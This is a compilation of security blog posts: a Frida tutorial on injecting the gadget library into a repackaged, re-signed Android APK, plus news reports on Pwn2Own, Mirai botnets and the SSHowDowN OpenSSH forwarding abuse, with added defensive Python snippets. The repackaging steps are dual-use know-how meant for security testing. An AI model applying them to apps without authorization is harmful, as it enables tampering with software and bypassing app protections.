Every developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.

Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug, the code just doesn’t work at all for a recipe with a size greater than 256. On macOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.

XNU is not alone in this; it’s a common story across many codebases. For example, LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation, and for extra irony the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.

from Project Zero http://ift.tt/2nZVJBt

Using Frida on Android without root

Frida is a great toolkit by @oleavr, used to build tools for dynamic instrumentation of apps in userspace.
It is often used, like Substrate, Xposed and similar frameworks, during security reviews of mobile applications by security professionals.

Typically such a review requires a rooted Android device. There are several reasons for this, but the most important is that the frida-server binary, which executes on the device, requires root privileges to attach to (ptrace) the target application in order to inject the Frida gadget library into the memory space of the process.

However, testing on a rooted device is not the only way! I am not sure why this technique is not more widely publicized, but Frida can also be used on non-rooted Android devices and non-jailbroken iPhones, without running frida-server at all. In this post I will focus on Android, however things are pretty similar on iOS – frida can also be used on jailed Apple devices.

A few advantages of using Frida on a non-rooted device:

  • Enables testing on devices you cannot or do not want to root (obviously).
  • Avoids some side effects due to application checks for ptracing/debugging or checks for a tampered environment.

However:

  • This technique will trigger checks against repackaging, unless those are separately bypassed.

Adding frida-gadget to an Android application

The technique is simple, it can be described in short as “adding a shared library & repackaging the Android application”. Here it is, step by step:

  1. Get the APK binary of the application you want to test, e.g. myapp.apk.
  2. Use apktool (preferably its latest version) to decode the APK into its contents.

    $ apktool d myapp.apk -o extractedFolder
    
  3. Add the frida native libraries (frida-gadget) into the APK’s /lib folder. The gadget libraries for each architecture can be found in Frida’s release page. Make sure to add the libraries for the correct architecture in a suitable folder under /lib, e.g. /lib/armeabi for 32bit ARM devices.

    $ apktool --version
    2.2.2
    
    $ apktool d -o out_dir original.apk
    I: Using Apktool 2.2.2 on original.apk
    I: Loading resource table...
    I: Decoding AndroidManifest.xml with resources...
    I: Loading resource table from file: ~/.local/share/apktool/framework/1.apk
    I: Regular manifest package...
    I: Decoding file-resources...
    I: Decoding values XMLs...
    I: Baksmaling classes.dex...
    I: Copying assets and libs...
    I: Copying unknown files...
    I: Copying original files...
    
    # download frida gadget - for 32bit ARM in this case
    $ wget http://ift.tt/2povVPv
    2017-04-11 10:48:45 (3.29 MB/s) - ‘frida-gadget-9.1.26-android-arm.so.xz’ saved [3680748/3680748]
    
    # extract the compressed archive
    $ unxz frida-gadget-9.1.26-android-arm.so.xz
    
    $ ls
    frida-gadget-9.1.26-android-arm.so
    
    # copy the frida gadget library into the armeabi directory under lib
    # (create the directory first if the app ships no native libraries)
    $ mkdir -p out_dir/lib/armeabi
    $ cp frida-gadget-9.1.26-android-arm.so out_dir/lib/armeabi/libfrida-gadget.so
    
  4. Inject a System.loadLibrary("frida-gadget") call into the bytecode of the app, ideally before any other bytecode executes or any native code is loaded. A suitable place is typically the static initializer of the entry point classes of the app, e.g. the main application Activity, found via the manifest.

    An easy way to do this is to add the following smali code in a suitable function:

    const-string v0, "frida-gadget"
    invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V
    

    Alternatively someone could create a script that injects the library into the process via ptrace; but this script would need to be packaged with the application (just like gdbserver).

  5. Add the Internet permission to the manifest if it’s not there already, so that Frida gadget can open a socket.

    <uses-permission android:name="android.permission.INTERNET" />
    
  6. Repackage the application:

    $ apktool b -o repackaged.apk out_dir/
    I: Using Apktool 2.2.2
    I: Checking whether sources has changed...
    I: Smaling smali folder into classes.dex...
    I: Checking whether resources has changed...
    I: Building resources...
    I: Copying libs... (/lib)
    I: Building apk file...
    I: Copying unknown files/dir...
    
  7. Sign the updated APK using your own keys and zipalign.

    # if you don't have a keystore already, here's how to create one
    $ keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
    
    # sign the APK
    $ jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass mystorepass repackaged.apk mykeyaliasname
    
    # verify the signature you just created
    $ jarsigner -verify repackaged.apk
    
    # zipalign the APK
    $ zipalign 4 repackaged.apk repackaged-final.apk
    
  8. Install the updated APK to a device.

If this process seems complicated, the good news is that it can be automated. As part of the appmon hooking framework (based on Frida) @dpnishant released apk_builder, a script automating most of the above steps!

Using frida gadget

When you next start the application you are going to see an empty screen: the injected libfrida-gadget.so library has opened a TCP socket and waits for a connection from Frida.

You should see a message similar to the following in logcat:

Frida: Listening on TCP port 27042

Running netstat on the device confirms the listening socket:

shell@flo:/ $ netstat -ln                                                  
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State     
tcp        0      0 127.0.0.1:27042         0.0.0.0:*               

As you might expect, the next step is connecting to the listening socket. Most Frida tools work as expected, although there are a few issues that could be handled better, e.g. connecting to the library after initialization, not just during loading.

There is just one thing to keep in mind: The process name you are going to use in Frida tooling should be “Gadget” instead of the normal package name.

$ frida-ps -U
Waiting for USB device to appear...
  PID  Name
-----  ------
16071  Gadget

Examples!

$ frida -U Gadget
     ____
    / _  |   Frida 9.1.26 - A world-class dynamic instrumentation framework
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at http://ift.tt/1hhG3wK
Waiting for USB device to appear...

[USB::Samsung SM-G925F::Gadget]-> Java.available
true
[USB::Samsung SM-G925F::Gadget]->
$ frida-trace -U -i open Gadget
Instrumenting functions...
open: Auto-generated handler at "/tmp/test/__handlers__/libc.so/open.js"
Started tracing 1 function. Press Ctrl+C to stop.                       
           /* TID 0x2df7 */
  4870 ms  open(pathname=0xa280b100, flags=0x241)
  4873 ms  open(pathname=0xb6d69df3, flags=0x2)
           /* TID 0x33d2 */
115198 ms  open(pathname=0xb6d69df3, flags=0x2)
115227 ms  open(pathname=0xb6d69df3, flags=0x2)

Enjoy!

from John Kozyrakis ~ blog http://ift.tt/2p7ycvw

Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own

The Tencent Keen Security Lab Team from China has won a total prize money of $215,000 in the 2016 Mobile Pwn2Own contest run by Trend Micro’s Zero Day Initiative (ZDI) in Tokyo, Japan.

Despite the high-security measures implemented in current devices, the well-known Chinese hacking crew successfully hacked both Apple’s iPhone 6S and Google’s Nexus 6P phones.

Hacking iPhone 6S

For hacking Apple’s iPhone 6S, Keen Lab exploited two iOS vulnerabilities (a use-after-free bug in the renderer and a memory corruption flaw in the sandbox) and stole pictures from the device, for which the team was awarded $52,500.

The iPhone 6S exploit successfully worked despite the iOS 10 update rolled out by Apple this week.

Earlier this week, Marco Grassi from Keen Lab was credited by Apple for finding a serious remote code execution flaw in iOS that could compromise a victim’s phone by just viewing “a maliciously crafted JPEG” image.

However, a tweet from Keen Team indicated it was able to make the attack successfully work on iOS 10.1 as well.

The Keen Lab also managed to install a malicious app on the iPhone 6S, but the app did not survive a reboot due to a default configuration setting, which prevented persistence. Still, the ZDI awarded the hackers $60,000 for the vulnerabilities they used in the hack.

Hacking Google’s Nexus 6P

For hacking the Nexus 6P, the Keen Lab Team used a combination of two vulnerabilities and other weaknesses in Android and managed to install a rogue application on the Google Nexus 6P phone without user interaction.

The ZDI awarded them a whopping $102,500 for the Nexus 6P hack.

So, of the total potential payout of $375,000 from Trend Micro’s Zero Day Initiative, the Keen Lab Team researchers took home $215,000.

from THN : The Hacker News http://ift.tt/2eTMESX

Chinese Electronics Firm to Recall its Smart Cameras recently used to Take Down Internet

You might be surprised to know that your security cameras, Internet-connected toasters and refrigerators may have inadvertently participated in the massive cyber attack that broke a large portion of the Internet on Friday.

That’s due to massive Distributed Denial of Service (DDoS) attacks against Dyn, a major Domain Name System (DNS) provider that many sites and services use as their upstream DNS provider for translating human-readable domain names into IP addresses.
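To make concrete what "translating domain names into IP addresses" means, here is a minimal Python sketch that asks the operating system's resolver for the addresses behind a hostname. It is only an illustration of the lookup step that Dyn's customers depended on, not anything specific to Dyn or to this attack; the helper name `resolve` is hypothetical.

```python
import socket


def resolve(hostname: str) -> list[str]:
    """Return the unique IP addresses the system resolver maps `hostname` to.

    For public names, the resolver ultimately relies on authoritative DNS
    servers (like those Dyn ran for its customers); if those servers are
    unreachable, lookups like this one fail and the site appears to be down.
    """
    addresses: list[str] = []
    # Each entry is (family, type, proto, canonname, sockaddr); sockaddr[0] is the IP.
    for family, _type, _proto, _canon, sockaddr in socket.getaddrinfo(hostname, None):
        ip = sockaddr[0]
        if ip not in addresses:
            addresses.append(ip)
    return addresses


if __name__ == "__main__":
    # "localhost" is normally answered from the local hosts file, so this works offline.
    print(resolve("localhost"))
```

Swapping in a public hostname shows the same call going out over the network to DNS.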

The result we all know:

Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and Airbnb were among hundreds of sites and services that were rendered inaccessible to millions of people worldwide for several hours.

Why and How the Deadliest DDoS Attack Happened

It was reported that Mirai bots were used in the massive DDoS attacks against DynDNS, but they “were separate and distinct” bots from those used to execute the record-breaking DDoS attack against French Internet service and hosting provider OVH.

Here’s why:

Initially, the source code of the Mirai malware was limited to a small number of hackers who were aware of the underground hacking forum where it was released.

But later, the link to the Mirai source code suddenly received a huge promotion from thousands of media websites after it got exclusively publicized by journalist Brian Krebs on his personal blog.

Due to the worldwide news coverage and promotion, copycat and amateur hackers are now creating their own botnets by hacking millions of smart devices to launch DDoS attacks, as well as to make money by selling their botnets as a DDoS-for-hire service.

Mirai malware is designed to scan for Internet of Things (IoT) devices (mostly routers, security cameras, DVRs or WebIP cameras, Linux servers, and devices running Busybox) that are still using their default passwords. It enslaves vast numbers of these devices into a botnet, which is then used to launch DDoS attacks.
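Since Mirai relies entirely on credentials nobody changed, the defensive counterpart is simply to check your own devices for factory defaults. The Python sketch below does that for a small inventory. The credential pairs, device names, and helper names are all hypothetical placeholders; it does not reproduce Mirai's actual password list, and a real audit would load a curated list of vendor defaults instead.

```python
# Hypothetical, illustrative factory-default pairs; replace with a curated list.
FACTORY_DEFAULTS: set[tuple[str, str]] = {
    ("admin", "admin"),
    ("admin", "password"),
    ("root", "root"),
}


def uses_factory_default(username: str, password: str,
                         defaults: set[tuple[str, str]] = FACTORY_DEFAULTS) -> bool:
    """Return True if the (username, password) pair is a known default."""
    return (username, password) in defaults


def audit(devices: dict[str, tuple[str, str]]) -> list[str]:
    """Return the sorted names of devices still configured with default credentials."""
    return sorted(name for name, (user, pw) in devices.items()
                  if uses_factory_default(user, pw))


if __name__ == "__main__":
    inventory = {  # hypothetical devices on your own network
        "camera-lobby": ("admin", "admin"),
        "dvr-garage": ("admin", "S7rong&Unique!"),
        "nas-office": ("root", "root"),
    }
    print(audit(inventory))  # ['camera-lobby', 'nas-office']
```

Anything this flags is exactly the kind of device a Mirai-style scanner would pick up.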

Chinese Firm Admits Its Hacked DVRs and Cameras Were Behind Largest DDoS Attack

More such attacks are expected to happen and will not stop until IoT manufacturers take the security of these Internet-connected devices seriously.

One such IoT electronics manufacturer is Chinese firm Hangzhou Xiongmai Technology, which admitted its products (DVRs and internet-connected cameras) inadvertently played a role in Friday’s massive cyber attack against DynDNS.

The Mirai malware can easily be removed from infected devices by rebooting them, but the devices will be reinfected within minutes if their owners and manufacturers do not take proper measures to protect them.

What’s worse?

Some of these devices, including connected devices from Xiongmai, cannot be protected because they use hardcoded passwords and their makers built them in a way that prevents them from being easily updated.

“Mirai is a huge disaster for the Internet of Things,” the company confirmed to IDG News. “[We] have to admit that our products also suffered from hacker’s break-in and illegal use.”

The company claimed to have rolled out patches for the security vulnerabilities, involving weak default passwords, that allowed the Mirai malware to infect its products and use them to launch a massive DDoS attack against DynDNS.

However, Xiongmai products running older versions of the firmware are still vulnerable. To tackle this issue, the company has advised its customers to update their products’ firmware and change their default credentials.

The electronics components firm would also recall some of its earlier products, specifically webcam models, sold in the US, and send customers a patch for products made before April last year, Xiongmai said in a statement on its official microblog.

Hackers are selling IoT-based Botnet capable of 1 Tbps DDoS Attack

Even worse is expected:

Friday’s DDoS attack that knocked down half of the Internet in the U.S. is just the beginning, because hackers have started selling access to a huge army of hacked IoT devices designed to launch attacks capable of severely disrupting any web service.

The seller claimed their botnet could generate 1 Terabit per second of traffic, almost equal to the world’s largest DDoS attack against OVH earlier this month, Forbes reported.

Anyone could buy 50,000 bots for $4,600, and 100,000 bots for $7,500, which can be combined to overwhelm targets with data.
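The two price points are easier to compare per bot. This small Python sketch just does that arithmetic on the figures quoted above; the helper name `price_per_bot` is ours, not the seller's.

```python
# Bundle prices quoted in the report (bots -> total price in USD).
OFFERS = {50_000: 4_600, 100_000: 7_500}


def price_per_bot(bots: int, total_usd: float) -> float:
    """Return the advertised cost of a single bot within a bundle."""
    return total_usd / bots


if __name__ == "__main__":
    for bots, total in OFFERS.items():
        print(f"{bots:,} bots for ${total:,}: ${price_per_bot(bots, total):.3f} per bot")
```

That works out to about $0.092 per bot for the smaller bundle and $0.075 per bot for the larger one, so the bigger bundle is roughly 18% cheaper per bot.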

Hacker groups have long sold access to botnets as a DDoS weapon for hire, like the infamous Lizard Squad’s DDoS attack tool Lizard Stresser, but those botnets largely consisted of compromised vulnerable routers, not IoT devices like connected cameras, toasters, fridges and kettles (which are now available in bulk).

In a separate disclosure, a hacking group calling itself New World Hackers has also claimed responsibility for Friday’s DDoS attacks, though this has not yet been confirmed.

New World Hackers is the same group that briefly knocked the BBC offline last year. The group claimed to be a hacktivist collective with members in China, Russia, and India.

Well, who is behind Friday’s cyber attack is still unclear. The US Department of Homeland Security (DHS) and the FBI are investigating the DDoS attacks that hit DynDNS, but neither agency has yet speculated on who might be behind them.

The DynDNS DDoS attack has already shown the danger of IoT-based botnets, and it should alarm both IoT manufacturers into implementing security in their products and end users into caring about the basic safety of their connected devices.

from THN : The Hacker News http://ift.tt/2eL4ibu

12-Year-Old SSH Bug Exposes More than 2 Million IoT Devices

Are your internet-connected devices spying on you? Perhaps.

We already know that Internet of Things (IoT) devices are so badly insecure that hackers are adding them to their botnets to launch Distributed Denial of Service (DDoS) attacks against target services.

But these connected devices are not limited to conducting DDoS attacks; they have far more potential to harm you.

New research [PDF] published by the content delivery network provider Akamai Technologies shows how unknown threat actors are using a 12-year-old vulnerability in OpenSSH to secretly gain control of millions of connected devices.

The hackers then turn what researchers call the "Internet of Unpatchable Things" into proxies for malicious traffic to attack internet-based targets and ‘internet-facing’ services, along with the internal networks that host them.

Unlike recent attacks via the Mirai botnet, the new targeted attack, dubbed SSHowDowN Proxy, specifically makes use of IoT devices such as:

  • Internet-connected Network Attached Storage (NAS) devices.
  • CCTV, NVR, DVR devices (video surveillance).
  • Satellite antenna equipment.
  • Networking devices like routers, hotspots, WiMax, cable and ADSL modems.
  • Other devices could be susceptible as well.

More importantly, the SSHowDowN Proxy attack exploits a more than decade-old default configuration flaw (CVE-2004-1653) in OpenSSH that was initially discovered in 2004 and patched in early 2005. The flaw is an insecure default that leaves TCP forwarding enabled, which allows port bounces when a proxy is in use.
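Because this is a default-configuration problem rather than a coding bug, a device stays exposed unless its sshd_config explicitly turns forwarding off. The Python sketch below reports the global `AllowTcpForwarding` value an sshd_config would end up with: OpenSSH defaults it to `yes`, and sshd uses the first value it reads for a keyword. The helper names are hypothetical, and the sketch deliberately ignores `Match` blocks and `Include` directives, so treat it as a quick check. On a real system, `sshd -T` prints the effective configuration authoritatively.

```python
DEFAULT_ALLOW_TCP_FORWARDING = "yes"  # OpenSSH's default when the keyword is absent


def effective_tcp_forwarding(config_text: str) -> str:
    """Return the global AllowTcpForwarding value for the given sshd_config text.

    Simplifications (assumptions of this sketch): parsing stops at the first
    Match block and Include directives are not followed.
    """
    for raw_line in config_text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments
        # "Keyword value" and "Keyword=value" are both accepted; keywords ignore case.
        parts = line.replace("=", " ", 1).split(None, 1)
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            break  # everything after this is conditional; out of scope here
        if keyword == "allowtcpforwarding":
            return value.lower()  # first value wins, as in sshd
    return DEFAULT_ALLOW_TCP_FORWARDING


def forwarding_disabled(config_text: str) -> bool:
    """True only if TCP forwarding is fully disabled in the global section."""
    return effective_tcp_forwarding(config_text) == "no"


if __name__ == "__main__":
    sample = "Port 22\n# AllowTcpForwarding no\nPermitRootLogin no\n"
    print(effective_tcp_forwarding(sample))  # commented out, so the default applies
```

The sample prints `yes`: a commented-out directive leaves the vulnerable default in place.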

However, after analyzing IP addresses from its Cloud Security Intelligence platform, Akamai estimates that over 2 Million IoT and networking devices have been compromised by SSHowDowN type attacks.

Due to lax credential security, hackers can compromise IoT devices and then use them to mount attacks "against a multitude of Internet targets and Internet-facing services, like HTTP, SMTP and network scanning," and to mount attacks against internal networks that host these connected devices.

Once hackers access the web administration console of vulnerable devices, it is possible for them to compromise the device’s data and, in some cases, fully take over the affected machine.

While the flaw itself is not especially critical, the company says the continual failure of vendors to secure IoT devices, along with their use of default and hard-coded credentials, has left the door wide open for hackers to exploit them.

"We are entering a very interesting time when it comes to DDoS and other web attacks; ‘The Internet of Unpatchable Things’ so to speak," said Eric Kobrin, senior director of Akamai’s Threat Research team. 

"New devices are being shipped from the factory not only with this vulnerability exposed but also without any effective way to fix it. We’ve been hearing for years that it was theoretically possible for IoT devices to attack. That, unfortunately, has now become the reality."

According to the company, at least 11 of Akamai’s customers in industries such as financial services, retail, hospitality, and gaming have been targets of SSHowDowN Proxy attack.

The company is "currently working with the most prevalent device vendors on a proposed plan of mitigation."

How to Mitigate Such Attacks?

So, if you own a connected coffee machine, thermostat or any IoT device, you can protect yourself by changing the factory default credentials of your device as soon as you activate it, as well as disabling SSH services on the device if it is not required.

More technical users can establish inbound firewall rules that prevent SSH access from external networks.

Meanwhile, vendors of internet-connected devices are recommended to:

  • Avoid shipping such products with undocumented accounts.
  • Force their customers to change the factory default credentials after device installation.
  • Restrict TCP forwarding.
  • Allow users to update the SSH configuration to mitigate such flaws.
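For the "restrict TCP forwarding" recommendation, a device owner or vendor would set options like the following in OpenSSH's server configuration. This is an illustrative excerpt under the assumption that the device runs a reasonably recent OpenSSH; all four keywords are standard sshd_config options, but which ones a given device honors depends on its OpenSSH version.

```
# /etc/ssh/sshd_config (excerpt): disable the forwarding features abused as proxies
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
PermitOpen none
```

Running `sshd -t` before restarting the daemon checks the file for errors, which avoids locking yourself out of a remote device.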

Since the number of IoT devices has now reached the tens of billions, it’s time to protect these devices before hackers cause a disaster.

Non-profit organizations like MITRE have come forward to help protect IoT devices by challenging researchers to come up with new, non-traditional approaches for detecting rogue IoT devices on a network. MITRE is also offering up to $50,000 in prize money.

from The Hacker News http://ift.tt/2e9YgVO